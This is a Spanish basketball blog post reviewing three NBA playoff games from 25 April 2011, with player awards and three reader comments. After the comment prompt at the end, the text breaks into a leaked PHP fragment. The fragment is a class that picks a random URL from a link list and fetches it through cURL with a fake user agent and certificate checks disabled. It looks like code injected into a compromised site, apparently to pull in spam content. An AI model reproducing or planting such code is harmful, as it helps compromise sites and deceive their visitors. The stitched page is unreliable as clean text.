Playoffs (25/04/2011): El crepúsculo de los dioses

26 de April de 2011 por TheDeerHunter

Los Spurs se quedan al borde de la eliminación tras la última derrota.

Rara vez en ellos ha quedado tan patente el declive como en esta ocasión. El frontcourt formado por Duncan, McDyess y Jefferson, de excepcional nivel en otras épocas, fue humillado anoche por la defensa de Lionel Hollins sustentada sobre la alargada sombra de Marc Gasol, quien se está ganando a pulso que se lo rifen el próximo verano. Parker y Ginobili, las otras dos patas del tridente mítico de San Antonio, intentaron escapar de la maraña pero lo lograron sólo en parte y es que ellos estaban más acostumbrados a atrapar en su tela que a que les atrapen. Hill, Neal y Splitter dieron un paso adelante pero no fue suficiente (86-104).

Hollins parece haber puesto un cruel espejo a Popovic. Nos ha sorprendido a todos con un equipo profundo, rocoso, intenso, solidario y muy hambriento, como nadie había visto en Memphis. Espartanos muy al gusto del entrenador de los Spurs.  ¿Mejoraría con Gay disponible? No es fácil. ¿Lo mejoraría el propio “sargento de hierro” al mando de la nave? Habría que verlo.

A los Spurs más exquisitos y ofensivos de su historia más reciente se les atraganta una extraña versión de si mismos. Resulta irónico.

Los Mavs, por su parte, se desquitaron del batacazo del otro día volviendo a recuperar la ventaja en la serie. Chandler hizo un roto considerable por dentro y Nowitzki disfrutó como nunca de tener un pívot de verdad al lado. Marion y Terry resultaron vitales. Kidd no lanzó bien pero dirigió perfecto. La defensa de Carlisle funcionó. ¿Qué más se puede pedir? Pues que sean constantes. En los Blazers, Aldridge y Camby lo están pasando muy mal y anoche, sin resurrección de Roy, sólo Wallace y Miller infligieron realmente daño (82-93). El próximo choque es en el Rose Garden y allí no gana cualquiera.

Finalmente los Nuggets evitaron la escoba gracias a la presencia del lesionado Gallinari, a los arrebatos de Jr Smith y, sobre todo, a la liada que montó Ty Lawson con las propias armas de Russell Westbrook. Un intercambio de golpes que se resolvió por pequeños detalles. Una actuación demasiado relajada de Harden y algunas pérdidas de más por parte de Oklahoma propiciaron la derrota que no ha de pasar de ser un simple tropiezo (101-104).

PREMIOS

MVP: Ty Lawson y sus 27 puntos (con 9 de 9 en tiros libres incluídos)fueron clave en la victoria de los Nuggets sobre los Thunder. Por su parte, Dirk Nowitzki anotó 25 puntos a los que sumó 8 rebotes. MVP compartido el de hoy.

Sorpresa: Danilo Gallinari se reencontró consigo mismo a pesar de la lesión que arrastra para anotar 18 puntos, coger 6 rebotes y repartir 4 asistencias. Sin duda, será un jugador importante para Denver en el futuro.

Decepción: Richard Jefferson personaliza el declive de los Spurs. No fue capaz de anotar ni un solo punto en 27 minutos de juego.

Esfuerzo en vano: Esta vez la buena actuación de Durant & Westbrook se quedó sin premio. Entre los 2 anotaron 61 puntos pero no fueron suficientes.

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    El partido de Memphis fue perfecto, supieron aprovechar cada ocasión para correr y a la vez fueron una pesadilla de defensa, si Hollins sigue manejando el banco igual de bien son un rival durísimo para cualquiera, porque OJ Mayo, Vasquez y Arthur no son unos cualquiera, los 3 estan acostumbrados a lucir galones de su etapa universitaria y no van a eludir la responsabilidad.

    Los Mavs con Chandler a ese nivel son otro hueso, mas aun si a la misma vez Kidd se hincha a repartir juego, porque de ejecutores van servidos con Nowitzki y Terry.

      Citar

  2. sergio dice:
    #2

    Ví el SAS-MEM ayer y, la verdad, me quedé impresionado. Hacía mucho tiempo que no veía una defensa perimetral tan buena y tan involucrada en los dos lados de la cancha. Ayer dominaron a los tejanos a base de “testiculina” y empuje. Aunque las 22 asistencias de los Grizzlies no parezcan demasiadas, ayer ví practicamente a todos dar un pase de canasta de cierto nivel con ningún jugador (Haddadi y Powe aparte) por debajo del 40%.

    A Duncan lo vi lentísimo y perdiendo unos cuantos balones o siendo culpable de que se perdiesen. Ayer Splitter jugó un buen partido… ante suplentes y en los minutos de la basura. Por cierto, ¿alguien sabe porque Blair sólo jugó los últimos 5 minutos de partido?.

    Eso si, aunque el equipo de Tennesse esté muy cerca de cargarse a las espuelas, no los matemos antes de tiempo. Ayer todo funcionó a la perfección para que le endosasen esos casi 20 puntos de ventaja. Va a ser fundamental que los ositos sepan sobrellevar la ventaja y seguir concentrados en el resto de partidos. No va a ser nada fácil.

    Ah! si no hace mucho hablabamos de lo mucho que van a echar de menos a Perkins en Boston…. creo que a Tony Allen lo añoran aún más.

      Citar

  3. GreenPride dice:
    #3

    Ayer vi los 3 partidos así que por partes.
    Los Grizzlies me impresionaron como a todos. Gran defensa exterior cortando las líneas de pase y por dentro van sobrado con Marc y ZBo. Todo el equipo va unas cuantas revoluciones por encima de unos Spurs en los que sólo Ginobilli y Parker parecen estar en la misma velocidad de los de Memphis que hacen parecer realmente abuelos a McDyess, Duncan, Jeffersson y cia. No hay que matar a los Spurs pero veo difícil que se puedan levantar aunque un buen 5º partido dejaría las cosas muy calientes para el 6º.
    Luego los Mavs se repusieron de su desastre en le 4º periodo del 4º partido con un partido bastante bueno. Kidd repartiendo bien juego y sobre todo un Chandler que cogió 14 rebotes en ataque se impusieron a los Blazers en los que Rudy sigue mal y esta vez no apareció Roy. Los mejores Miller y Wallace, que con su fortaleza dan muchos quebraderos de cabeza defensivos a los Mavs. Veremos si los Blazers fuerzan el 7º en el Rose Garden, yo apuesto por ello.
    Y para acabar, lección de lucha y pundonor de Denver. Todo el equipo involucrado para llevar el partido a un ritmo frenético que hay que decir que los Thunder resistieron hasta el final. Pero en las últimas jugadas Westbrook se olvidó de que un base debe dirigir y a poder ser dar la bola al mejor jugador de tu equipo que no es él sino Durant como se vió en el triplazo que cascó éste último en la única de las 4 últimas posesiones que le dieron. Las otras 3 fueron tiros precipitados de Russell que les llevaron a la derrota. Aún así veo bastante superior a los Thunder que defensivamente por dentro asustan y creo que la serie acabará en el siguiente partido. Gran partido de Lawson y Gallinari por los Nuggets que merecían no ser barridos y desconocido Wilson Chandler que está haciendo unas series horrorosas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>